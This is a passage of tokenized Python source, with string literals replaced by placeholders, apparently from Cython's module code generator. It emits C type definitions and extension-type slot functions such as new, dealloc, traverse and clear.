append ( new_entry ) <EOL> return type_list <EOL> def sort_type_hierarchy ( self , module_list , env ) : <EOL> vtab_dict = { } <EOL> vtabslot_dict = { } <EOL> for module in module_list : <EOL> for entry in module . c_class_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . vtabstruct_cname : <EOL> vtab_dict [ type . vtabstruct_cname ] = entry <EOL> all_defined_here = module is env <EOL> for entry in module . type_entries : <EOL> if all_defined_here or entry . defined_in_pxd : <EOL> type = entry . type <EOL> if type . is_extension_type and not entry . in_cinclude : <EOL> type = entry . type <EOL> vtabslot_dict [ type . objstruct_cname ] = entry <EOL> def vtabstruct_cname ( entry_type ) : <EOL> return entry_type . vtabstruct_cname <EOL> vtab_list = self . sort_types_by_inheritance ( <EOL> vtab_dict , vtabstruct_cname ) <EOL> def objstruct_cname ( entry_type ) : <EOL> return entry_type . objstruct_cname <EOL> vtabslot_list = self . sort_types_by_inheritance ( <EOL> vtabslot_dict , objstruct_cname ) <EOL> return ( vtab_list , vtabslot_list ) <EOL> def generate_type_definitions ( self , env , modules , vtab_list , vtabslot_list , code ) : <EOL> vtabslot_entries = set ( vtabslot_list ) <EOL> for module in modules : <EOL> definition = module is env <EOL> if definition : <EOL> type_entries = module . type_entries <EOL> else : <EOL> type_entries = [ ] <EOL> for entry in module . type_entries : <EOL> if entry . defined_in_pxd : <EOL> type_entries . append ( entry ) <EOL> for entry in type_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . is_typedef : <EOL> self . generate_typedef ( entry , code ) <EOL> elif type . is_struct_or_union : <EOL> self . generate_struct_union_definition ( entry , code ) <EOL> elif type . is_enum : <EOL> self . generate_enum_definition ( entry , code ) <EOL> elif type . is_extension_type and entry not in vtabslot_entries : <EOL> self . 
generate_obj_struct_definition ( type , code ) <EOL> for entry in vtabslot_list : <EOL> self . generate_obj_struct_definition ( entry . type , code ) <EOL> for entry in vtab_list : <EOL> self . generate_typeobject_predeclaration ( entry , code ) <EOL> self . generate_exttype_vtable_struct ( entry , code ) <EOL> self . generate_exttype_vtabptr_declaration ( entry , code ) <EOL> def generate_declarations_for_modules ( self , env , modules , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> vtab_list , vtabslot_list = self . sort_type_hierarchy ( modules , env ) <EOL> self . generate_type_definitions ( <EOL> env , modules , vtab_list , vtabslot_list , code ) <EOL> for module in modules : <EOL> defined_here = module is env <EOL> code . putln ( "<STR_LIT>" % <EOL> module . qualified_name . encode ( "<STR_LIT>" , "<STR_LIT:ignore>" ) ) <EOL> self . generate_global_declarations ( module , code , defined_here ) <EOL> self . generate_cfunction_predeclarations ( module , code , defined_here ) <EOL> def generate_module_preamble ( self , env , cimported_modules , code ) : <EOL> code . putln ( '<STR_LIT>' % ( <EOL> Version . version , time . asctime ( ) ) ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> for filename in env . python_include_files : <EOL> code . putln ( '<STR_LIT>' % filename ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . 
putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . put ( builtin_module_name_utility_code . proto ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . 
putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if Future . division in env . context . future_directives : <EOL> code . putln ( "<STR_LIT>" ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_extern_c_macro_definition ( code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . api_guard_prefix + self . api_name ( env ) ) <EOL> self . generate_includes ( env , cimported_modules , code ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . put ( Nodes . utility_function_predeclarations ) <EOL> code . put ( PyrexTypes . type_conversion_predeclarations ) <EOL> code . put ( Nodes . branch_prediction_macros ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % env . module_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . builtins_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . empty_tuple ) <EOL> if Options . pre_import is not None : <EOL> code . putln ( '<STR_LIT>' % Naming . preimport_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . lineno_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . clineno_cname ) <EOL> code . putln ( '<STR_LIT>' % ( Naming . cfilenm_cname , Naming . file_c_macro ) ) <EOL> code . putln ( '<STR_LIT>' % Naming . filename_cname ) <EOL> code . putln ( '<STR_LIT>' % Naming . filetable_cname ) <EOL> if env . doc : <EOL> docstr = env . 
doc <EOL> if not isinstance ( docstr , str ) : <EOL> docstr = docstr . utf8encode ( ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % ( <EOL> env . doc_cname , escape_byte_string ( docstr ) ) ) <EOL> def generate_extern_c_macro_definition ( self , code ) : <EOL> name = Naming . extern_c_macro <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' % name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_includes ( self , env , cimported_modules , code ) : <EOL> includes = env . include_files [ : ] <EOL> for module in cimported_modules : <EOL> for filename in module . include_files : <EOL> if filename not in includes : <EOL> includes . append ( filename ) <EOL> for filename in includes : <EOL> code . putln ( '<STR_LIT>' % filename ) <EOL> def generate_filename_table ( self , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . filenames_cname ) <EOL> if code . globalstate . filename_list : <EOL> for source_desc in code . globalstate . filename_list : <EOL> filename = os . path . basename ( source_desc . get_filenametable_entry ( ) ) <EOL> escaped_filename = filename . replace ( "<STR_LIT:\\>" , "<STR_LIT>" ) . replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' % <EOL> escaped_filename ) <EOL> else : <EOL> code . putln ( "<STR_LIT:0>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_type_predeclarations ( self , env , code ) : <EOL> pass <EOL> def generate_type_header_code ( self , type_entries , code ) : <EOL> for entry in type_entries : <EOL> if not entry . in_cinclude : <EOL> type = entry . type <EOL> if type . is_typedef : <EOL> self . generate_typedef ( entry , code ) <EOL> elif type . is_struct_or_union : <EOL> self . generate_struct_union_definition ( entry , code ) <EOL> elif type . is_enum : <EOL> self . generate_enum_definition ( entry , code ) <EOL> elif type . 
is_extension_type : <EOL> self . generate_obj_struct_definition ( type , code ) <EOL> def generate_gcc33_hack ( self , env , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . c_class_entries : <EOL> type = entry . type <EOL> if not type . typedef_flag : <EOL> name = type . objstruct_cname <EOL> if name . startswith ( "<STR_LIT>" ) : <EOL> tail = name [ <NUM_LIT:6> : ] <EOL> else : <EOL> tail = name <EOL> code . putln ( "<STR_LIT>" % ( <EOL> name , tail ) ) <EOL> def generate_typedef ( self , entry , code ) : <EOL> base_type = entry . type . typedef_base_type <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % base_type . declaration_code ( entry . cname ) ) <EOL> def sue_header_footer ( self , type , kind , name ) : <EOL> if type . typedef_flag : <EOL> header = "<STR_LIT>" % kind <EOL> footer = "<STR_LIT>" % name <EOL> else : <EOL> header = "<STR_LIT>" % ( kind , name ) <EOL> footer = "<STR_LIT>" <EOL> return header , footer <EOL> def generate_struct_union_definition ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> scope = type . scope <EOL> if scope : <EOL> header , footer = self . sue_header_footer ( type , type . kind , type . cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> var_entries = scope . var_entries <EOL> if not var_entries : <EOL> error ( entry . pos , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for attr in var_entries : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> attr . type . declaration_code ( attr . cname ) ) <EOL> code . putln ( footer ) <EOL> def generate_enum_definition ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> name = entry . cname or entry . name or "<STR_LIT>" <EOL> header , footer = self . sue_header_footer ( type , "<STR_LIT>" , name ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> enum_values = entry . 
enum_values <EOL> if not enum_values : <EOL> error ( entry . pos , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> last_entry = enum_values [ - <NUM_LIT:1> ] <EOL> for value_entry in enum_values : <EOL> if value_entry . value == value_entry . name : <EOL> value_code = value_entry . cname <EOL> else : <EOL> value_code = ( "<STR_LIT>" % ( <EOL> value_entry . cname , <EOL> value_entry . value ) ) <EOL> if value_entry is not last_entry : <EOL> value_code += "<STR_LIT:U+002C>" <EOL> code . putln ( value_code ) <EOL> code . putln ( footer ) <EOL> def generate_typeobject_predeclaration ( self , entry , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> name = entry . type . typeobj_cname <EOL> if name : <EOL> if entry . visibility == '<STR_LIT>' and not entry . in_cinclude : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> name ) ) <EOL> elif entry . visibility == '<STR_LIT>' : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> name ) ) <EOL> def generate_exttype_vtable_struct ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> scope = type . scope <EOL> if type . vtabstruct_cname : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> type . vtabstruct_cname ) <EOL> if type . base_type and type . base_type . vtabstruct_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . base_type . vtabstruct_cname , <EOL> Naming . obj_base_cname ) ) <EOL> for method_entry in scope . cfunc_entries : <EOL> if not method_entry . is_inherited : <EOL> code . putln ( <EOL> "<STR_LIT>" % method_entry . type . declaration_code ( "<STR_LIT>" % method_entry . name ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_exttype_vtabptr_declaration ( self , entry , code ) : <EOL> code . mark_pos ( entry . pos ) <EOL> type = entry . type <EOL> if type . vtabptr_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . 
vtabptr_cname ) ) <EOL> def generate_obj_struct_definition ( self , type , code ) : <EOL> code . mark_pos ( type . pos ) <EOL> if not type . scope : <EOL> return <EOL> header , footer = self . sue_header_footer ( type , "<STR_LIT>" , type . objstruct_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( header ) <EOL> base_type = type . base_type <EOL> if base_type : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) [ base_type . typedef_flag ] , <EOL> base_type . objstruct_cname , <EOL> Naming . obj_base_cname ) ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if type . vtabslot_cname and not ( type . base_type and type . base_type . vtabslot_cname ) : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . vtabslot_cname ) ) <EOL> for attr in type . scope . var_entries : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> attr . type . declaration_code ( attr . cname ) ) <EOL> code . putln ( footer ) <EOL> def generate_global_declarations ( self , env , code , definition ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . c_class_entries : <EOL> if definition or entry . defined_in_pxd : <EOL> code . putln ( "<STR_LIT>" % <EOL> entry . type . typeptr_cname ) <EOL> code . put_var_declarations ( env . var_entries , static = <NUM_LIT:1> , <EOL> dll_linkage = "<STR_LIT>" , definition = definition ) <EOL> if definition : <EOL> code . put_var_declarations ( env . default_entries , static = <NUM_LIT:1> , <EOL> definition = definition ) <EOL> def generate_cfunction_predeclarations ( self , env , code , definition ) : <EOL> for entry in env . cfunc_entries : <EOL> if not entry . in_cinclude and ( definition <EOL> or entry . defined_in_pxd or entry . visibility == '<STR_LIT>' ) : <EOL> if entry . visibility in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> dll_linkage = "<STR_LIT>" <EOL> else : <EOL> dll_linkage = None <EOL> type = entry . type <EOL> if not definition and entry . 
defined_in_pxd : <EOL> type = CPtrType ( type ) <EOL> header = type . declaration_code ( entry . cname , <EOL> dll_linkage = dll_linkage ) <EOL> if entry . visibility == '<STR_LIT>' : <EOL> storage_class = "<STR_LIT>" <EOL> elif entry . visibility == '<STR_LIT>' : <EOL> storage_class = "<STR_LIT>" <EOL> else : <EOL> storage_class = "<STR_LIT>" % Naming . extern_c_macro <EOL> code . putln ( "<STR_LIT>" % ( <EOL> storage_class , <EOL> header ) ) <EOL> def generate_typeobj_definitions ( self , env , code ) : <EOL> full_module_name = env . qualified_name <EOL> for entry in env . c_class_entries : <EOL> if entry . visibility != '<STR_LIT>' : <EOL> type = entry . type <EOL> scope = type . scope <EOL> if scope : <EOL> self . generate_exttype_vtable ( scope , code ) <EOL> self . generate_new_function ( scope , code ) <EOL> self . generate_dealloc_function ( scope , code ) <EOL> if scope . needs_gc ( ) : <EOL> self . generate_traverse_function ( scope , code ) <EOL> self . generate_clear_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" ] ) : <EOL> self . generate_getitem_int_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_ass_subscript_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> warning ( self . pos , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . generate_ass_slice_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_getattro_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_setattro_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" ] ) : <EOL> self . generate_descr_get_function ( scope , code ) <EOL> if scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_descr_set_function ( scope , code ) <EOL> self . generate_property_accessors ( scope , code ) <EOL> self . 
generate_method_table ( scope , code ) <EOL> self . generate_member_table ( scope , code ) <EOL> self . generate_getset_table ( scope , code ) <EOL> self . generate_typeobj_definition ( full_module_name , entry , code ) <EOL> def generate_exttype_vtable ( self , scope , code ) : <EOL> type = scope . parent_type <EOL> if type . vtable_cname : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabstruct_cname , <EOL> type . vtable_cname ) ) <EOL> def generate_self_cast ( self , scope , code ) : <EOL> type = scope . parent_type <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> type . declaration_code ( "<STR_LIT:p>" ) , <EOL> type . declaration_code ( "<STR_LIT>" ) ) ) <EOL> def generate_new_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . ConstructorSlot ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> type = scope . parent_type <EOL> base_type = type . base_type <EOL> py_attrs = [ ] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject : <EOL> py_attrs . append ( entry ) <EOL> need_self_cast = type . vtabslot_cname or py_attrs <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> if need_self_cast : <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . parent_type . declaration_code ( "<STR_LIT:p>" ) ) <EOL> if base_type : <EOL> tp_new = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if tp_new is None : <EOL> tp_new = "<STR_LIT>" % base_type . typeptr_cname <EOL> code . putln ( <EOL> "<STR_LIT>" % tp_new ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if need_self_cast : <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % type . cast_code ( "<STR_LIT:o>" ) ) <EOL> if type . vtabslot_cname : <EOL> vtab_base_type = type <EOL> while vtab_base_type . base_type and vtab_base_type . base_type . vtabstruct_cname : <EOL> vtab_base_type = vtab_base_type . 
base_type <EOL> if vtab_base_type is not type : <EOL> struct_type_cast = "<STR_LIT>" % vtab_base_type . vtabstruct_cname <EOL> else : <EOL> struct_type_cast = "<STR_LIT>" <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabslot_cname , <EOL> struct_type_cast , type . vtabptr_cname ) ) <EOL> for entry in py_attrs : <EOL> if entry . name == "<STR_LIT>" : <EOL> code . putln ( "<STR_LIT>" % entry . cname ) <EOL> else : <EOL> code . put_init_var_to_py_none ( entry , "<STR_LIT>" ) <EOL> entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> if entry and entry . is_special : <EOL> if entry . trivial_signature : <EOL> cinit_args = "<STR_LIT>" % Naming . empty_tuple <EOL> else : <EOL> cinit_args = "<STR_LIT>" <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> ( entry . func_cname , cinit_args ) ) <EOL> code . put_decref_clear ( "<STR_LIT:o>" , py_object_type ) ; <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_dealloc_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . ConstructorSlot ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> py_attrs = [ ] <EOL> weakref_slot = scope . lookup_here ( "<STR_LIT>" ) <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry is not weakref_slot : <EOL> py_attrs . append ( entry ) <EOL> if py_attrs or weakref_slot in scope . var_entries : <EOL> self . generate_self_cast ( scope , code ) <EOL> self . generate_usr_dealloc_call ( scope , code ) <EOL> if weakref_slot in scope . var_entries : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in py_attrs : <EOL> code . put_xdecref ( "<STR_LIT>" % entry . cname , entry . 
type ) <EOL> if base_type : <EOL> tp_dealloc = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if tp_dealloc is None : <EOL> tp_dealloc = "<STR_LIT>" % base_type . typeptr_cname <EOL> code . putln ( <EOL> "<STR_LIT>" % tp_dealloc ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_usr_dealloc_call ( self , scope , code ) : <EOL> entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> if entry : <EOL> code . putln ( <EOL> "<STR_LIT:{>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> entry . func_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_traverse_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . GCDependentSlot ( "<STR_LIT>" ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % slot_func ) <EOL> py_attrs = [ ] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry . name != "<STR_LIT>" : <EOL> py_attrs . append ( entry ) <EOL> if base_type or py_attrs : <EOL> code . putln ( "<STR_LIT>" ) <EOL> if py_attrs : <EOL> self . generate_self_cast ( scope , code ) <EOL> if base_type : <EOL> static_call = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if static_call : <EOL> code . putln ( "<STR_LIT>" % static_call ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> for entry in py_attrs : <EOL> var_code = "<STR_LIT>" % entry . 
cname <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % var_code ) <EOL> if entry . type . is_extension_type : <EOL> var_code = "<STR_LIT>" % var_code <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % var_code ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_clear_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . GCDependentSlot ( "<STR_LIT>" ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % slot_func ) <EOL> py_attrs = [ ] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry . name != "<STR_LIT>" : <EOL> py_attrs . append ( entry ) <EOL> if py_attrs : <EOL> self . generate_self_cast ( scope , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if base_type : <EOL> static_call = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if static_call : <EOL> code . putln ( "<STR_LIT>" % static_call ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> for entry in py_attrs : <EOL> name = "<STR_LIT>" % entry . cname <EOL> code . putln ( "<STR_LIT>" % name ) <EOL> code . put_init_to_py_none ( name , entry . type ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_getitem_int_function ( self , scope , code ) : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . 
putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_ass_subscript_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> set_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_guarded_basetype_call ( <EOL> self , base_type , substructure , slot , args , code ) : <EOL> if base_type : <EOL> base_tpname = base_type . typeptr_cname <EOL> if substructure : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , substructure , base_tpname , substructure , slot ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , substructure , slot , args ) ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , slot ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , slot , args ) ) <EOL> def generate_ass_slice_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> set_entry = scope . 
